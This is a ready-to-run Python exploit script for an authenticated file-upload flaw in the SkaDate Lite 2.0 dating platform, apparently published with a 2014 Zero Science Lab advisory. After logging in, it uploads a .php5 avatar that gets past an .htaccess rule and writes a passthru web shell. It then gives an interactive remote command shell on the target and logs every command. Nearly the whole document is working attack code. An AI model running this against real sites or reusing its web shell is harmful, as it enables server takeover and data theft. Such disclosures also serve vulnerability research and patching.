SkaDate Lite 2.0 Remote Code Execution

`#!/usr/bin/env python  
#  
#  
# SkaDate Lite 2.0 Remote Code Execution Exploit  
#  
#  
# Vendor: Skalfa LLC  
# Product web page: http://lite.skadate.com | http://www.skalfa.com  
# Affected version: 2.0 (build 7651) [Platform version: 1.7.0 (build 7906)]  
#  
# Summary: SkaDate Lite is a new platform that makes it easy to  
# start online dating business in just a few easy steps. No  
# programming or design knowledge is required. Install the solution,  
# pick a template, and start driving traffic to your new online  
# dating site.  
#  
# Desc: SkaDate Lite suffers from an authenticated arbitrary PHP code  
# execution. The vulnerability is caused due to the improper  
# verification of uploaded files in '/admin/settings/user' script  
# thru the 'avatar' and 'bigAvatar' POST parameters. This can be  
# exploited to execute arbitrary PHP code by uploading a malicious  
# PHP script file with '.php5' extension (to bypass the '.htaccess'  
# block rule) that will be stored in '/ow_userfiles/plugins/base/avatars/'  
# directory.  
#  
# Tested on: CentOS Linux 6.5 (Final)  
# nginx/1.6.0  
# PHP/5.3.28  
# MySQL 5.5.37  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
#  
# Zero Science Lab - http://www.zeroscience.mk  
# Macedonian Information Security Research And Development Laboratory  
#  
#  
# Advisory ID: ZSL-2014-5198  
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5198.php  
#  
#  
# 23.07.2014  
#  
#  
  
version = '4.0.0.251'  
  
import itertools, mimetools, mimetypes  
import cookielib, urllib, urllib2, sys  
import logging, os, time, datetime, re  
  
from colorama import Fore, Back, Style, init  
from cStringIO import StringIO  
from urllib2 import URLError  
  
init()  
  
if os.name == 'posix': os.system('clear')  
if os.name == 'nt': os.system('cls')  
piton = os.path.basename(sys.argv[0])  
  
def bannerche():  
print '''  
@---------------------------------------------------------------@  
| |  
| SkaDate Lite 2.0 Remote Code Execution Exploit |  
| |  
| |  
| ID: ZSL-2014-5198 |  
| |  
| Copyleft (c) 2014, Zero Science Lab |  
| |  
@---------------------------------------------------------------@  
'''  
if len(sys.argv) < 2:  
print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname>\n'  
print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk\n'  
sys.exit()  
  
bannerche()  
  
print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET  
  
host = sys.argv[1]  
  
cj = cookielib.CookieJar()  
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))  
  
try:  
opener.open('http://'+host+'/sign-in?back-uri=admin')  
except urllib2.HTTPError, errorzio:  
if errorzio.code == 404:  
print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET  
print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET  
print  
sys.exit()  
except URLError, errorziocvaj:  
if errorziocvaj.reason:  
print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET  
print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET  
print  
sys.exit()  
  
print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET  
print '\x20\x20[*] Login please.'  
  
username = raw_input('\x20\x20[*] Enter username: ')  
password = raw_input('\x20\x20[*] Enter password: ')  
  
login_data = urllib.urlencode({  
'form_name' : 'sign-in',  
'identity' : username,  
'password' : password,  
'remember' : 'on',  
'submit' : 'Sign In'  
})  
  
try:  
login = opener.open('http://'+host+'/sign-in?back-uri=admin', login_data)  
auth = login.read()  
except urllib2.HTTPError, errorziotraj:  
if errorziotraj.code == 403:  
print '\x20\x20[*] '+Fore.RED+'Blocked by WAF.'+Fore.RESET  
print  
sys.exit()  
  
for session in cj:  
sessid = session.name  
  
print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET  
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))  
cookie = ses_chk.group(0)  
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET  
  
if re.search(r'Invalid username or email', auth):  
print '\x20\x20[*] Invalid username or email given '+'.'*23+Fore.RED+'[ER]'+Fore.RESET  
print  
sys.exit()  
elif re.search(r'Invalid password', auth):  
print '\x20\x20[*] Invalid password '+'.'*38+Fore.RED+'[ER]'+Fore.RESET  
sys.exit()  
else:  
print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET  
  
  
class MultiPartForm(object):  
  
def __init__(self):  
self.form_fields = []  
self.files = []  
self.boundary = mimetools.choose_boundary()  
return  
  
def get_content_type(self):  
return 'multipart/form-data; boundary=%s' % self.boundary  
  
def add_field(self, name, value):  
self.form_fields.append((name, value))  
return  
  
def add_file(self, fieldname, filename, fileHandle, mimetype=None):  
body = fileHandle.read()  
if mimetype is None:  
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'  
self.files.append((fieldname, filename, mimetype, body))  
return  
  
def __str__(self):  
  
parts = []  
part_boundary = '--' + self.boundary  
  
parts.extend(  
[ part_boundary,  
'Content-Disposition: form-data; name="%s"' % name,  
'',  
value,  
]  
for name, value in self.form_fields  
)  
  
parts.extend(  
[ part_boundary,  
'Content-Disposition: file; name="%s"; filename="%s"' % \  
(field_name, filename),  
'Content-Type: %s' % content_type,  
'',  
body,  
]  
for field_name, filename, content_type, body in self.files  
)  
  
flattened = list(itertools.chain(*parts))  
flattened.append('--' + self.boundary + '--')  
flattened.append('')  
return '\r\n'.join(flattened)  
  
if __name__ == '__main__':  
  
form = MultiPartForm()  
form.add_field('form_name', 'userSettingsForm')  
form.add_field('displayName', 'realname')  
form.add_field('confirmEmail', 'on')  
form.add_field('avatarSize', '90')  
form.add_field('bigAvatarSize', '190')  
form.add_field('avatar', '')  
form.add_field('join_display_photo_upload', 'display')  
form.add_field('save', 'Save')  
  
form.add_file('bigAvatar', 'thricerbd.php5',   
fileHandle=StringIO('<?php system(\'echo \"<?php echo \\"<pre>\\"; passthru(\$_GET[\\\'cmd\\\']); echo \\"</pre>\\"; ?>\" > liwo.php5\'); ?>'))  
  
request = urllib2.Request('http://'+host+'/admin/settings/user')  
request.add_header('User-agent', 'joxypoxy 4.0')  
body = str(form)  
request.add_header('Content-type', form.get_content_type())  
request.add_header('Cookie', cookie)  
request.add_header('Content-length', len(body))  
request.add_data(body)  
request.get_data()  
urllib2.urlopen(request).read()  
print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET  
checkfilename = urllib2.urlopen(request).read()  
filename = re.search('default_avatar_big_(\w+)', checkfilename).group(1)  
print '\x20\x20[*] Getting file name '+'.'*37+Fore.GREEN+'[OK]'+Fore.RESET  
print '\x20\x20[*] File name: '+Fore.YELLOW+'default_avatar_big_'+filename+'.php5'+Fore.RESET  
  
opener.open('http://'+host+'/ow_userfiles/plugins/base/avatars/default_avatar_big_'+filename+'.php5')  
print '\x20\x20[*] Persisting file liwo.php5 '+'.'*29+Fore.GREEN+'[OK]'+Fore.RESET  
  
print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET  
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET  
time.sleep(1)  
  
furl = '/ow_userfiles/plugins/base/avatars/liwo.php5'  
  
print  
today = datetime.date.today()  
fname = 'skadate-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'  
logging.basicConfig(filename=fname,level=logging.DEBUG)  
  
logging.info(' '+'+'*75)  
logging.info(' +')  
logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))  
logging.info(' + Title: SkaDate Lite 2.0 Remote Code Execution Exploit')  
logging.info(' + Python program executed: '+sys.argv[0])  
logging.info(' + Version: '+version)  
logging.info(' + Full query: \''+piton+'\x20'+host+'\'')  
logging.info(' + Username input: '+username)  
logging.info(' + Password input: '+password)  
logging.info(' + Vector: '+'http://'+host+furl)  
logging.info(' +')  
logging.info(' + Advisory ID: ZSL-2014-5198')  
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')  
logging.info(' +')  
logging.info(' '+'+'*75+'\n')  
  
print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET  
raw_input()  
while True:  
try:  
cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)  
execute = opener.open('http://'+host+furl+'?cmd='+urllib.quote(cmd))  
reverse = execute.read()  
pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)  
  
print Style.BRIGHT+Fore.CYAN  
cmdout = pattern.match(reverse)  
print cmdout.groups()[0].strip()  
print Style.RESET_ALL+Fore.RESET  
  
if cmd.strip() == 'exit':  
break  
  
logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')  
except Exception:  
break  
  
logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')  
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET  
print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET  
print  
  
sys.exit()  
`